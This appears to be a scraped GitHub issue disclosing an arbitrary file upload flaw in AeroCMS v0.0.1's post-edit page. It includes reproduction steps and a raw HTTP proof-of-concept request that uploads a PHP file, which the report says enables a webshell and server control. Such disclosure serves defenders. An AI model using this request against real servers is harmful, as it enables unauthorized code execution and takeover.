AeroCMS icon indicating copy to clipboard operation
AeroCMS copied to clipboard

Published 20 hours ago verified publisher icon MegaTKC

AeroCMS v0.0.1 Arbitrary File upload vulnerability

Open w4n95 opened this issue 2 years ago • 0 comments

  • Description

In AeroCms v0.0.1, an arbitrary file upload vulnerability at /admin/posts.php?source=edit_post , through which we can upload webshell and control the web server.

  • Step to Reproduct

  1. Login to admin panel -> Posts -> View All Posts -> Edit image

  2. when jump to the post edit page, and you can see that the function of uploading pictures exists. upload malicious file phpinfo.php image

  3. When upload success access '/images/phpinfo.php', the file was successfully uploaded and executed image

  • Vulnerable Code

No file checking before uploading in edit_post.php file image

  • POC

`POST /AeroCMS/admin/posts.php?source=edit_post&p_id=3 HTTP/1.1 Host: 192.168.111.169 Content-Length: 991 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.111.169 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryi7wHcLADqqvNM4nO User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.111.169/AeroCMS/admin/posts.php?source=edit_post&p_id=3 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2m17ikpogrvubj8l2687hc3n45 Connection: close

------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="post_title"

mysql ------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="post_category_id"

1 ------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="post_user"

admin ------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="post_status"

draft ------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="image"; filename="phpinfo.php" Content-Type: application/octet-stream

------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="post_tags"

mysql, database ------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="post_content"

AeroCMS is created with mysql database.

------WebKitFormBoundaryi7wHcLADqqvNM4nO Content-Disposition: form-data; name="update_post"

Edit Post ------WebKitFormBoundaryi7wHcLADqqvNM4nO-- `

w4n95 avatar Nov 27 '22 11:11 w4n95